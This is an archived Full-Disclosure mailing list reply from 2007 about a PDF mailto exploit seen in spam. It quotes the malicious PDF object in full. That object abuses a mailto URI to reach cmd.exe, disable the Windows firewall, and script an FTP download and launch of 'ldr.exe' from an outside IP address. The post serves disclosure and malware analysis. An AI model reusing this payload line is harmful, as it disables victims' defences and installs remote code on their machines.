[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] PDF mailto exploit in the wild

To: 3APA3A@xxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] PDF mailto exploit in the wild
From: Paul Szabo <psz@xxxxxxxxxxxxxxxxx>
Date: Wed, 24 Oct 2007 07:54:46 +1000

Dear 3APA3A,

>  Messages  like  this  I've  got are PDF spam without attempt to exploit
>  something, and are spammed since July. Not sure about this one though.

You seem to have missed the line

obj<</URI(mailto:%/../../../../../../Windows/system32/cmd".exe""; /c /q \"@echo 
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo 
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start 
ldr.exe&\" \"&\" "nul.bat)/S/URI>>

within "my" PDF. Am not sure whether that would have worked, but is
unfriendly and not your average Viagra, sharemarket or porn message.
Some AV vendors recognize it, as shown by virustotal.

Cheers,

Paul Szabo   psz@xxxxxxxxxxxxxxxxx   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- Re: [Full-disclosure] PDF mailto exploit in the wild
  - From: 3APA3A

Prev by Date: [Full-disclosure] [USN-537-1] gnome-screensaver vulnerability
Next by Date: [Full-disclosure] DHS need to get on top of this right now
Previous by thread: Re: [Full-disclosure] PDF mailto exploit in the wild
Next by thread: Re: [Full-disclosure] PDF mailto exploit in the wild
Index(es):
- Date
- Thread